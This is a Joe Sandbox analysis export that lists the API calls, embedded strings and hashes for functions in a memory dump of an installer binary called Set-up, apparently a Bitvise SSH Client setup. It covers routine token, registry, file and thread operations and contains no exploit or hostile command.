                                                                                                                                  • Opcode Fuzzy Hash: cb8b5a4c7aa9b373ab35080af41894311a6404e5ca4cbc12f997231d31559d69
                                                                                                                                  • Instruction Fuzzy Hash: B521F775E51214AFCB359B78A848A5EBFFDEF49710F0800AAF815D3208D7B45944CBE1
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 011120FF
                                                                                                                                    • Part of subcall function 00E3A2C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E3A2D7
                                                                                                                                    • Part of subcall function 00E3A2C0: ___std_exception_copy.LIBVCRUNTIME ref: 00E3A321
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskException@8Throw___std_exception_copy
                                                                                                                                  • String ID: - $ use only.$2$6$9.39$Activation code valid for upgrades released until $Bitvise SSH Client $This license is good for business and government use.$This license is granted for $free of charge for use in all environments$licensed to
                                                                                                                                  • API String ID: 2281437974-2095094827
                                                                                                                                  • Opcode ID: 57c0c14a83c7599d06316fc2bdac8b138d406d4b08d7786ad4b735a9e56e416c
                                                                                                                                  • Instruction ID: 9958127b5a262c889644d01957d744b697f25b28836acc789fb1982219fa10a6
                                                                                                                                  • Opcode Fuzzy Hash: 57c0c14a83c7599d06316fc2bdac8b138d406d4b08d7786ad4b735a9e56e416c
                                                                                                                                  • Instruction Fuzzy Hash: EBC19F70A00249AEDF18EBA4D855FDEFBB8AF14700F104569F552B71D2EB70AB48CB91
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E3C3EA
                                                                                                                                    • Part of subcall function 00E59DF0: OpenProcessToken.ADVAPI32(00000000,00000008,460C02D8,460C02D8,?), ref: 00E59E1F
                                                                                                                                    • Part of subcall function 00E59DF0: GetLastError.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000,01166088,000000FF), ref: 00E59E2B
                                                                                                                                    • Part of subcall function 00E59DF0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E59E5A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E3C5D8
                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,00000001,?,?,00000000,?), ref: 00E3C5F4
                                                                                                                                    • Part of subcall function 00E8C970: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,460C02D8,?,00000000), ref: 00E8C9B7
                                                                                                                                    • Part of subcall function 00E8C970: GetCurrentProcessId.KERNEL32(?,00000000), ref: 00E8CA33
                                                                                                                                    • Part of subcall function 00E8C970: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E8CA50
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E3C426
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • new.LIBCMT ref: 00E3C42D
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?), ref: 00E3C441
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E3C62D
                                                                                                                                  Strings
                                                                                                                                  • %, xrefs: 00E3C9C4
                                                                                                                                  • ", xrefs: 00E3C764
                                                                                                                                  • Only users with administrative rights can apply updates., xrefs: 00E3C405
                                                                                                                                  • Updates cannot be applied: , xrefs: 00E3C573
                                                                                                                                  • A log file for this update will be stored in directory:, xrefs: 00E3C70B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentException@8Throw$CreateErrorExceptionFirstLastOpenProcess32RaiseSnapshotTokenToolhelp32
                                                                                                                                  • String ID: "$%$A log file for this update will be stored in directory:$Only users with administrative rights can apply updates.$Updates cannot be applied:
                                                                                                                                  • API String ID: 3617671986-1672820807
                                                                                                                                  • Opcode ID: c75afd77122f356b52a6f11abdadc2fef0ed467013c1f20c8af5106e23a40397
                                                                                                                                  • Instruction ID: 0ab8335e9470d1c4566f55c1aa77211cae3f9ddb66a80b339c8864a41eb088c0
                                                                                                                                  • Opcode Fuzzy Hash: c75afd77122f356b52a6f11abdadc2fef0ed467013c1f20c8af5106e23a40397
                                                                                                                                  • Instruction Fuzzy Hash: 7ED1AC70D04248EEDB15EBB4D95ABDDBFF4AF11308F2490A8E00977292DB745B48DB62
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E5AC70: GetTokenInformation.ADVAPI32(?,011A3C52(TokenIntegrityLevel),00000000,00000000,460C02D8,460C02D8,011A3C52,?,?), ref: 00E5ACB0
                                                                                                                                    • Part of subcall function 00E5AC70: GetLastError.KERNEL32 ref: 00E5ACBE
                                                                                                                                    • Part of subcall function 00E5AC70: GetLastError.KERNEL32 ref: 00E5ACD4
                                                                                                                                    • Part of subcall function 00E5AC70: __CxxThrowException@8.LIBVCRUNTIME ref: 00E5AD41
                                                                                                                                    • Part of subcall function 00E5AC70: GetTokenInformation.ADVAPI32(?,TokenIntegrityLevel,?,?,00000000,00000000,00000002,460C02D8), ref: 00E5AD86
                                                                                                                                    • Part of subcall function 00E5AC70: GetLastError.KERNEL32 ref: 00E5AD94
                                                                                                                                  • IsValidSid.ADVAPI32(00000000,460C02D8,00000002,460C02D8,460C02D8,011A3C52,?,?), ref: 00E59F4E
                                                                                                                                  • EqualSid.ADVAPI32(?,-00000004), ref: 00E59F6E
                                                                                                                                  • IsValidSid.ADVAPI32(?,011A3C52,?), ref: 00E5A077
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00E5A082
                                                                                                                                  • CopySid.ADVAPI32(00000000,00000001,?,!af_,datavect<unsigned char>::begin,000001E2,?,01303694), ref: 00E5A0C1
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5A105
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A130
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Exception@8InformationThrowTokenValid$CopyEqualLength
                                                                                                                                  • String ID: !af_$CopySid()$datavect<unsigned char>::begin$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 1022477060-310490073
                                                                                                                                  • Opcode ID: cfd1e655eafad3810d51f0945d67425e5f1b8145844cc2415edd8efa1339dfab
                                                                                                                                  • Instruction ID: 1c5f5a79a1ebc1ec10924f2b15b57f50af72c59b2c4e6edaef7418bb03e012e1
                                                                                                                                  • Opcode Fuzzy Hash: cfd1e655eafad3810d51f0945d67425e5f1b8145844cc2415edd8efa1339dfab
                                                                                                                                  • Instruction Fuzzy Hash: 6271D071A04205ABDB24DFA5DC45BAEBBF8AB54719F14092DF815B3280E770A948C7A2
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E6E480: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?), ref: 00E6E52A
                                                                                                                                    • Part of subcall function 00E6E480: __CxxThrowException@8.LIBVCRUNTIME ref: 00E6E586
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6E171
                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000), ref: 00E6E192
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6E19F
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6E1E0
                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,460C02D9,-00000002,00000000), ref: 00E6E206
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6E210
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6E251
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw$EnvironmentErrorExpandLastStrings$QueryValue
                                                                                                                                  • String ID: !af_$RegQueryValueExW()$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 4015144550-2130799390
                                                                                                                                  • Opcode ID: e0386c58709341741697478ba27d06870567376402acad09aea29b7b1bf94f4f
                                                                                                                                  • Instruction ID: 6e103d2f71bc5a4c1405e8a0a9babe20c1fc906e8af6c77e6e7339c2af71de59
                                                                                                                                  • Opcode Fuzzy Hash: e0386c58709341741697478ba27d06870567376402acad09aea29b7b1bf94f4f
                                                                                                                                  • Instruction Fuzzy Hash: 27D1D034A402099FCF18DF64D894BEEBBB9AF44754F048168E815BB3C5DB74AD05CBA0
                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0112D78A
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C6AB
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C6BD
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C6CF
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C6E1
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C6F3
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C705
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C717
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C729
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C73B
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C74D
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C75F
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C771
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C783
                                                                                                                                  • _free.LIBCMT ref: 0112D77F
                                                                                                                                    • Part of subcall function 01126F59: HeapFree.KERNEL32(00000000,00000000,?,0112CE0A,?,00000000,?,00000000,?,0112D0AE,?,00000007,?,?,0112D8DE,?), ref: 01126F6F
                                                                                                                                    • Part of subcall function 01126F59: GetLastError.KERNEL32(?,?,0112CE0A,?,00000000,?,00000000,?,0112D0AE,?,00000007,?,?,0112D8DE,?,?), ref: 01126F81
                                                                                                                                  • _free.LIBCMT ref: 0112D7A1
                                                                                                                                  • _free.LIBCMT ref: 0112D7B6
                                                                                                                                  • _free.LIBCMT ref: 0112D7C1
                                                                                                                                  • _free.LIBCMT ref: 0112D7E3
                                                                                                                                  • _free.LIBCMT ref: 0112D7F6
                                                                                                                                  • _free.LIBCMT ref: 0112D804
                                                                                                                                  • _free.LIBCMT ref: 0112D80F
                                                                                                                                  • _free.LIBCMT ref: 0112D847
                                                                                                                                  • _free.LIBCMT ref: 0112D84E
                                                                                                                                  • _free.LIBCMT ref: 0112D86B
                                                                                                                                  • _free.LIBCMT ref: 0112D883
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  • Opcode ID: 00ab8a3b3e44644e3a792b4cddd8db08edbe3fb1ea8c502d1223acba6fe81ca9
                                                                                                                                  • Instruction ID: 507d04aae8dd5170cdefe0329fd4756c5cd92de05c9444e4dab17f6bd80f2562
                                                                                                                                  • Opcode Fuzzy Hash: 00ab8a3b3e44644e3a792b4cddd8db08edbe3fb1ea8c502d1223acba6fe81ca9
                                                                                                                                  • Instruction Fuzzy Hash: C53169316046629FEF2DAAB8F844B5AB7E8EF00318F50442DE95CD7190DF74E8A4CB21
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID: !af_$!af_ && i<s_$Could not find a "versions" tag in the update information XML$Unknown$datavect<class Str8XmlPart *>::operator []$datavect<class Str8XmlPart *>::size$datavect<unsigned char>::size$ncvector<class Str8XmlPart>::operator []$version
                                                                                                                                  • API String ID: 2005118841-280143189
                                                                                                                                  • Opcode ID: e40926739d03c1c8cc8322b09b7e8f1b0b48394b9e9bc003aeb31635808c065a
                                                                                                                                  • Instruction ID: 4a670fecd29ccdb7889a985dba4c8f685ad8fa3d482986ed288e17504cc00619
                                                                                                                                  • Opcode Fuzzy Hash: e40926739d03c1c8cc8322b09b7e8f1b0b48394b9e9bc003aeb31635808c065a
                                                                                                                                  • Instruction Fuzzy Hash: A8C1AF70A11608DFDF25EF54C945BADBBF0FF10708F4090A9E9497B292DB71AA44CB62
                                                                                                                                  APIs
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,011A3C52(TokenIntegrityLevel),00000000,00000000,460C02D8,460C02D8,011A3C52,?,?), ref: 00E5ACB0
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E5ACBE
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E5ACD4
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5AD41
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,TokenIntegrityLevel,?,?,00000000,00000000,00000002,460C02D8), ref: 00E5AD86
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E5AD94
                                                                                                                                  • GetLastError.KERNEL32(!af_,datavect<unsigned char>::size,000001E7,00000000,00000002,460C02D8), ref: 00E5ADF5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$InformationToken$Exception@8Throw
                                                                                                                                  • String ID: !af_$GetTokenInformation(first)$GetTokenInformation(second)$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 1581449499-1179448594
                                                                                                                                  • Opcode ID: 1f6fe43c8f1de5b36c495ea3fceeaa67608d51aff214b41572b8adcc2fca696b
                                                                                                                                  • Instruction ID: bd3309991aeb337899b796006fd6b8887ba0b52370e827b5cb6ac34c1cf15d33
                                                                                                                                  • Opcode Fuzzy Hash: 1f6fe43c8f1de5b36c495ea3fceeaa67608d51aff214b41572b8adcc2fca696b
                                                                                                                                  • Instruction Fuzzy Hash: 6C518271A00209ABDF14EBA1DD45FAFBBF8EF14709F540529F900F6180EB719948CBA2
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$!af_ && i<s_$NumCast$count >= 0$datavect<struct QuantumRegistry::Entry *>::begin$datavect<struct QuantumRegistry::Entry *>::operator []$ncvector<struct QuantumRegistry::Entry>::insert$ncvector_it<struct QuantumRegistry::Entry>::operator -$ptrs_ == x.ptrs_$value >= 0
                                                                                                                                  • API String ID: 0-2751344132
                                                                                                                                  • Opcode ID: a8a28cb1ba683dcdf6039232698e97dfa9f5884bd25e3012595b4f790bb257ab
                                                                                                                                  • Instruction ID: c7e750029c86ddd9efb351f0e3ab7047f1e8488078578453bef51b14806c755b
                                                                                                                                  • Opcode Fuzzy Hash: a8a28cb1ba683dcdf6039232698e97dfa9f5884bd25e3012595b4f790bb257ab
                                                                                                                                  • Instruction Fuzzy Hash: 1551C0B0A40359EFDF24DF54D841B9EBBF4EB94720F11816EE8146B381D7B5A900CBA2
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                  • GetFileSize.KERNEL32(?,?), ref: 00E6B8D6
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6B8E3
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B950
                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,?), ref: 00E6B990
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E6B99A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B9F1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorException@8LastThrow$BreakConcurrency::cancel_current_taskDebugDebuggerModuleNamePresentSize
                                                                                                                                  • String ID: !af_$GetFileSize()$SetEndOfFile()$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 2002377842-1736402520
                                                                                                                                  • Opcode ID: 241143ac3b4b43b0d697741d06496cc3ac7f04fc95ae32bb4bfc113a2e739ba3
                                                                                                                                  • Instruction ID: 898915c22fe2aeb960b12fa3f5b61f09dde57490ffbd4df7bf343511aab9ad01
                                                                                                                                  • Opcode Fuzzy Hash: 241143ac3b4b43b0d697741d06496cc3ac7f04fc95ae32bb4bfc113a2e739ba3
                                                                                                                                  • Instruction Fuzzy Hash: 3F41E2302002069FC718EF25E89596DBBE5FF88764F10062DF925D3394DB70B845CB96
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$!af_ && i<s_$NumCast$datavect<class basic_ncstring<wchar_t> *>::at$first < last$ncvector<class basic_ncstring<wchar_t> >::assign$ncvector_const_it<class basic_ncstring<wchar_t> >::operator *$ptrs_$value >= 0
                                                                                                                                  • API String ID: 0-2345452866
                                                                                                                                  • Opcode ID: 65f703b340e82469bf44b1b26bbd92073a90e3889c29f71f5353cbfc324cdf94
                                                                                                                                  • Instruction ID: ab405ad4ea0449cb14f55112bf8caf8b0a7abb3f5b3c977988a7ce417d909553
                                                                                                                                  • Opcode Fuzzy Hash: 65f703b340e82469bf44b1b26bbd92073a90e3889c29f71f5353cbfc324cdf94
                                                                                                                                  • Instruction Fuzzy Hash: F741D070B40245ABCB24EF14EC92F9A77E0EB52724F10951DF855BB2C0C7B0AD40CB56
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E454B9
                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,0131DFD8,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8,?,?,0131DFD8,?,?,?,?), ref: 00E454C9
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AB84,00000003), ref: 00E454E1
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AB84,00000003), ref: 00E45507
                                                                                                                                  • SetEvent.KERNEL32(?,0131DFD8,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8), ref: 00E45518
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AB84,00000003), ref: 00E45568
                                                                                                                                  • SetEvent.KERNEL32(?,0131DFD8,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8), ref: 00E45574
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExchangeInterlocked$Event$CurrentObjectSingleThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1261316448-0
                                                                                                                                  • Opcode ID: bb810bb6d8f8aa3a1fa167a08b98d04d8a0265e686daba0ed826a7471e460e9e
                                                                                                                                  • Instruction ID: ed4a62346149ce445c746d90869e7fd339c0a2b4885a3904c33c2d590c3be3e3
                                                                                                                                  • Opcode Fuzzy Hash: bb810bb6d8f8aa3a1fa167a08b98d04d8a0265e686daba0ed826a7471e460e9e
                                                                                                                                  • Instruction Fuzzy Hash: D9411076606685DFCB34CFA8F8457A87BB9FB04726F1046AEE821E3386D7395940CB10
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(0131AB84,00000000,00000000), ref: 00E4533B
                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,0131DFD8,000000FE,?,00E44C1B,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8,?,?,0131DFD8,?,?,?), ref: 00E45357
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AB84,00000003), ref: 00E4536F
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AB84,00000003), ref: 00E45395
                                                                                                                                  • SetEvent.KERNEL32(00000000,?,0131DFD8,000000FE), ref: 00E453A9
                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E453BE
                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,0131DFD8,000000FE), ref: 00E453E0
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,0131DFD8,000000FE), ref: 00E45410
                                                                                                                                  • ReleaseMutex.KERNEL32(00000000,?,0131DFD8,000000FE), ref: 00E4542E
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,0131DFD8,000000FE), ref: 00E45435
                                                                                                                                  • SwitchToThread.KERNEL32(?,0131DFD8,000000FE,?,00E44C1B,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8,?,?,0131DFD8,?,?,?,?), ref: 00E4546A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExchangeInterlocked$CloseHandleObjectSingleWait$CallCompareEventFilterFunc@8MutexReleaseSwitchThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3389554242-0
                                                                                                                                  • Opcode ID: 1ccba530b206746614b02d73233ce6145932410196ad9aaa326aee55dc161dbc
                                                                                                                                  • Instruction ID: 783e669dd31795f2aa2d98b93cda25173f2cf6a64b04c099b8b2d4e1d3548032
                                                                                                                                  • Opcode Fuzzy Hash: 1ccba530b206746614b02d73233ce6145932410196ad9aaa326aee55dc161dbc
                                                                                                                                  • Instruction Fuzzy Hash: EB311433645A559BD7398FA9FC49B6D77B8FB00766F100239F422E3288D775A844CB50
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,0131A974,00000000,?,?,\InprocServer32,0000000F,00000000,000000FF,?,00000000,000000FF,?,?,?,460C02D8), ref: 0106FC8C
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0106FC9C
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(80000002,0131A974,00000000,011E3870,00000000,?,00000000,?,00000000), ref: 0106FD34
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,0131A974,00000000), ref: 0106FDE9
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,0131A974,00000000,?,?), ref: 0106FE61
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,RuntimeVersion,00000000,00000000,?,?), ref: 0106FF05
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: OpenValue$CloseCreateQuery
                                                                                                                                  • String ID: 11223344556677889900$RuntimeVersion$\InprocServer32
                                                                                                                                  • API String ID: 3757241582-2218457465
                                                                                                                                  • Opcode ID: 7d8f5993660c2e5d9af6c1e8f64e6d4989c831e47ffa907ea4ded042f66328ca
                                                                                                                                  • Instruction ID: d8be8b73da02b250ee85d0dc7151ec4c404eb320be582a425b5584bfdf74ced8
                                                                                                                                  • Opcode Fuzzy Hash: 7d8f5993660c2e5d9af6c1e8f64e6d4989c831e47ffa907ea4ded042f66328ca
                                                                                                                                  • Instruction Fuzzy Hash: ACA1D170904209DFDB24DF64DD59BAEBBF8FF05304F1081A8E599A7281DB75AA48CF90
                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?), ref: 00E6E52A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6E586
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00E6DCBF,?,?,?), ref: 00E6E653
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$ExceptionException@8RaiseThrow
                                                                                                                                  • String ID: !af_$NumCast$RegQueryKeyEx()$RegQueryValueExW()$datavect<unsigned char>::begin$value >= 0
                                                                                                                                  • API String ID: 3970428279-1042171720
                                                                                                                                  • Opcode ID: 0fff043a415af68505ef22ebb8fd8b57f2d17e0db9d10c148bbcd19bd875db30
                                                                                                                                  • Instruction ID: 293279926b0872889a8c3b8b13c7326c81094c6a5a4dbca5b9d4b1121883b1bc
                                                                                                                                  • Opcode Fuzzy Hash: 0fff043a415af68505ef22ebb8fd8b57f2d17e0db9d10c148bbcd19bd875db30
                                                                                                                                  • Instruction Fuzzy Hash: 649199B4A40209EFDF14DFA0D855BAEBBF5FB08754F104229E921B72C0DB75A915CBA0
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(00000020,460C02D8,00000000,?,00000000), ref: 00F13152
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00F13179
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00F13185
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F131B3
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000020,00000000,00000000), ref: 00F13225
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000020,00000000,00000000), ref: 00F13270
